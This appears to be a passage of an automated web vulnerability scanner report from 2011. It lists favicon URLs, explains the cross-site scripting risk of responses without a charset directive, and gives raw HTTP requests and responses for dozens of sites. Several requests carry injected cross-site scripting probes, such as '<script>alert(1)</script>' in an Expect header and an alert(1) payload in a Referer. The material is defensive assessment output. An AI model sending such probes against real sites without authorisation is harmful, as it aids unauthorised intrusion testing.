http://www.islamfortoday.com/favicon.ico
http://www.journalinquirer.com/favicon.ico
http://www.journalofaccountancy.com/favicon.ico
http://www.jrward.com/favicon.ico
http://www.kerbeck.com/favicon.ico
http://www.kidk.com/favicon.ico
http://www.kuryakyn.com/favicon.ico
http://www.latinspicebabes.com/favicon.ico
http://www.linkblur.com/favicon.ico
http://www.little-tiny.net/favicon.ico
http://www.louisvilleky.gov/favicon.ico
http://www.lumens.com/favicon.ico
http://www.mailfinity.net/favicon.ico
http://www.maleindress.com/favicon.ico
http://www.manchesterairport.com/favicon.ico
http://www.manga31.com/favicon.ico
http://www.maturevideoclips.net/favicon.ico
http://www.maysville-online.com/app/scripts/ajaxModules/'+upickemDeals[0][2]+'
http://www.mdnr-elicense.com/favicon.ico
http://www.meettheboss.tv/favicon.ico
http://www.megateengalls.com/favicon.ico
http://www.mercadolivre.com.br/favicon.ico
http://www.mercagames.com/favicon.ico
http://www.methodisthealth.org/favicon.ico
http://www.million-movies.com/favicon.ico
http://www.millionlooks.com/favicon.ico
http://www.momspussies.com/favicon.ico
http://www.moneyfactory.gov/favicon.ico
http://www.myezdeal.com/favicon.ico
http://www.myfreedegree.com/favicon.ico
http://www.myspacecursor.net/favicon.ico
http://www.nascigs.com/favicon.ico
http://www.newscanary.com/favicon.ico
http://www.noah-health.org/favicon.ico
http://www.oldmanwish.com/favicon.ico
http://www.outsideinfo.com/favicon.ico
http://www.outsidethebeltway.com/favicon.ico
http://www.pakalertpress.com/favicon.ico
http://www.pemonitorhosted.com/favicon.ico
http://www.perfectgirlsclub.com/favicon.ico
http://www.pipedomain.com/favicon.ico
http://www.presidentsusa.net/favicon.ico
http://www.private-teen-movies.com/favicon.ico
http://www.privatemomsvideos.com/favicon.ico
http://www.procarcare.com/favicon.ico
http://www.projectguitar.com/favicon.ico
http://www.propertyqube.com/favicon.ico
http://www.psoklahoma.com/favicon.ico
http://www.raftergrafting.com/favicon.ico
http://www.reflector.com/favicon.ico
http://www.registerstar.com/favicon.ico
http://www.rentawreck.com/favicon.ico
http://www.restaurantrow.com/favicon.ico
http://www.rogerssportinggoods.com/favicon.ico
http://www.rosscountyfair.com/favicon.ico
http://www.runningwarehouse.com/favicon.ico
http://www.rv-clubs.us/favicon.ico
http://www.satellitesales.com/favicon.ico
http://www.secretmomsvideos.com/favicon.ico
http://www.sekindo.com/favicon.ico
http://www.servpro.com/favicon.ico
http://www.sheezyart.com/favicon.ico
http://www.sister-seduction.net/favicon.ico
http://www.slipstick.com/favicon.ico
http://www.squirt-disgrace.net/favicon.ico
http://www.srv17.com/favicon.ico
http://www.sugarslam.com/favicon.ico
http://www.surnamesite.com/favicon.ico
http://www.surveysuperrewards.com/favicon.ico
http://www.tatravelcenters.com/favicon.ico
http://www.teriskitchen.com/favicon.ico
http://www.theoldschoolhousestore.com/favicon.ico
http://www.timescommunity.com/favicon.ico
http://www.toonshere.com/favicon.ico
http://www.toviaz.com/favicon.ico
http://www.tradearca.com/favicon.ico
http://www.travisa.com/favicon.ico
http://www.triadfinancial.com/favicon.ico
http://www.tubegoggles.com/favicon.ico
http://www.tubewifes.com/favicon.ico
http://www.tulalipcasino.com/favicon.ico
http://www.uacareertrack.com/favicon.ico
http://www.unclaimed.com/favicon.ico
http://www.upskirtcollection.net/favicon.ico
http://www.uscareerinstitute.edu/favicon.ico
http://www.vampirediaries.com/favicon.ico
http://www.vindictuswiki.com/favicon.ico
http://www.vivalagames.com/favicon.ico
http://www.voltairenet.org/favicon.ico
http://www.wavy10.com/favicon.ico
http://www.wdasfm.com/favicon.ico
http://www.webfeedreader.com/favicon.ico
http://www.westathome.com/favicon.ico
http://www.wildmatures.org/favicon.ico
http://www.willistonherald.com/favicon.ico
http://www.willyouhost.com/favicon.ico
http://www.wrestlewithjimmy.net/favicon.ico
http://www.wtma.com/favicon.ico
http://www.wyyo.com/favicon.ico
http://www.xcomment.com/favicon.ico
http://www.xratedbodybuilders.com/favicon.ico
http://www.youngerbunnies.com/favicon.ico
http://www.zegeridotc.com/favicon.ico

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

29.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.no_url_specifiedOX2462/B4639841.8

Request

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

29.2. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Request

Response

29.3. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

Response

29.4. http://ads.specificmedia.com/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Request

Response

29.5. http://afe.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/

Request

Response

29.6. http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d13.zedo.com
Path:	/OzoDB/cutils/R53_5/jsc/1190/zpu.html

Request

GET /OzoDB/cutils/R53_5/jsc/1190/zpu.html?n=1190;f=1;z=2-110 HTTP/1.1
Host: d13.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=1; FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 1666092439
Cache-Control: max-age=1451153
Expires: Fri, 20 May 2011 10:47:03 GMT
Date: Tue, 03 May 2011 15:41:10 GMT
Connection: close
Content-Length: 1340

<html>
<body>
<SCRIPT LANGUAGE="JavaScript">
var zcc7=new Array();var zcd9=0;
function zCF5(zcw1){
if(zcd9<1){
var zct3=''+window.location.search;var zcv4=new Array();var zcd3=zct3.indexOf(';l=')+1;
i
...[SNIP]...

29.7. http://d3.zedo.com/jsc/d3/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250 HTTP/1.1
Host: d3.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=1; FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 Apr 2011 05:53:29 GMT
ETag: "22023bc-8cf-4a12b02c56840"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 348094932 348093978
Cache-Control: max-age=314843
Expires: Sat, 07 May 2011 07:08:33 GMT
Date: Tue, 03 May 2011 15:41:10 GMT
Connection: close
Content-Length: 2255


<html>
<head>
<script language="JavaScript">
var q2=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

29.8. http://www.670kboi.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.670kboi.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.670kboi.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.9. http://www.a1freesoundeffects.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.a1freesoundeffects.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.a1freesoundeffects.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:24:40 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.10. http://www.adsomega.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adsomega.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adsomega.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 10:24:20 GMT
Server: lighttpd/1.4.20

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.11. http://www.aionarmory.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aionarmory.com
Path:	/favicon.ico

Request

Response

29.12. http://www.airgunsofarizona.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.airgunsofarizona.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.airgunsofarizona.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:37 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 Jul 2006 22:44:47 GMT
ETag: "384f91a-e36-7eb215c0"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/html

..............h...&... ..............(....... ...........@...............................@@@.........```.!!!.....ppp.........000.....RRR.....888.....JJJ.hhh.................yyy.........'''.XXX.EEE...
...[SNIP]...

29.13. http://www.alanskitchen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alanskitchen.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alanskitchen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:25:13 GMT
Server: Apache
Last-Modified: Tue, 19 Apr 2011 06:36:16 GMT
ETag: "ef25309c-39a-4a13fb9a6c448"
Accept-Ranges: bytes
Content-Length: 922
Content-Type: text/html

<html>

<head>

</head>

<frameset rows="50,*">

<frame scrolling="no" frameborder="0" src="http://missing.hwpub.com/404-header.htm">

<frame scrolling="auto" frameborder="0" src="http
...[SNIP]...

29.14. http://www.am570radio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.15. http://www.amateursgfs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amateursgfs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateursgfs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Tue, 03 May 2011 11:03:24 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.16. http://www.amospublishing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amospublishing.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amospublishing.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:40:56 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.17. http://www.arnottindustries.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.arnottindustries.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arnottindustries.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:46:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.18. http://www.artscraftsshowbusiness.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.artscraftsshowbusiness.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.artscraftsshowbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 1128
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:22:24 GMT

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at arts&#99
...[SNIP]...

29.19. http://www.ashmax.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ashmax.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashmax.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:24:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b PHP/5.2.6
Last-Modified: Wed, 05 Nov 2008 13:54:09 GMT
ETag: "1788b3d-e57-45af183a3a240"
Accept-Ranges: bytes
Content-Length: 3671
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Parallels H-Sphere</title>
<link rel="icon" href="default_html/favicon.ico" type="image/ico">
<style type="text
...[SNIP]...

29.20. http://www.bajafresh.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bajafresh.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bajafresh.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:24:16 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1691
Content-Type: text/html

<HTML>
   <HEAD><TITLE>Page Not Found</TITLE></HEAD>

   <BODY BGCOLOR="#FFFFFF" LINK="maroon" VLINK="maroon"
ALINK="maroon">
   <CENTER>
   <TABLE WIDTH="85%" BORDER="1" BORDERCOLOR="#000000"
CELLSPACING="
...[SNIP]...

29.21. http://www.baylinerownersclub.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.baylinerownersclub.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.baylinerownersclub.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:40:21 GMT
Server: Apache
Last-Modified: Tue, 19 Apr 2011 06:44:08 GMT
ETag: "90fcdc77-39a-4a13fd5ce0ac9"
Accept-Ranges: bytes
Content-Length: 922
Content-Type: text/html

<html>

<head>

</head>

<frameset rows="50,*">

<frame scrolling="no" frameborder="0" src="http://missing.hwpub.com/404-header.htm">

<frame scrolling="auto" frameborder="0" src="http
...[SNIP]...

29.22. http://www.best18teens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.best18teens.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.best18teens.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not found
Server: LOVE/4_3
Date: Tue, 03 May 2011 10:24:21 GMT
Connection: close
Content-Type: text/html
Accept-Ranges: bytes

<html><head><title>Error 404 Not found
</title></head><body bgcolor=#ffffff><h2>Error 404 Not found
</h2><p><i>Powered by <b>=NF=LOVE[BCG][DFCG][YYePG]</b></i></body></html>

29.23. http://www.bestcontactform.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bestcontactform.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bestcontactform.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Connection: close
Content-Type: text/html
Content-Length: 363
Date: Tue, 03 May 2011 10:59:26 GMT
Server: lighttpd/1.4.20

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.24. http://www.bigblackass.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigblackass.tv
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigblackass.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Tue, 03 May 2011 10:23:31 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

29.25. http://www.bizmove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizmove.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizmove.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:25:34 GMT
Server: Apache
Last-Modified: Sat, 28 Oct 2006 14:03:08 GMT
ETag: "ac0096-3bd-7f09ff00"
Accept-Ranges: bytes
Content-Length: 957
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at bizmove.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...

29.26. http://www.blackgold.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackgold.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackgold.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:58 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.27. http://www.bloxnine.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bloxnine.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bloxnine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.28. http://www.brenhambanner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brenhambanner.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brenhambanner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Tue, 03 May 2011 10:38:40 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: brenhambanner.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.29. http://www.bullied-by-her-dad.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bullied-by-her-dad.info
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullied-by-her-dad.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.30. http://www.carolinarustica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carolinarustica.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carolinarustica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.31. http://www.carsondellosa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carsondellosa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carsondellosa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:59:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.32. http://www.cheaptalkwireless.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheaptalkwireless.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheaptalkwireless.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.33. http://www.chemicalelements.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chemicalelements.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chemicalelements.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.34. http://www.collegegfs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collegegfs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegegfs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 03 May 2011 10:18:30 GMT
Content-Type: text/html
Connection: keep-alive
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 485

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.c
...[SNIP]...

29.35. http://www.colormecontacts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.colormecontacts.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.colormecontacts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:16:03 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
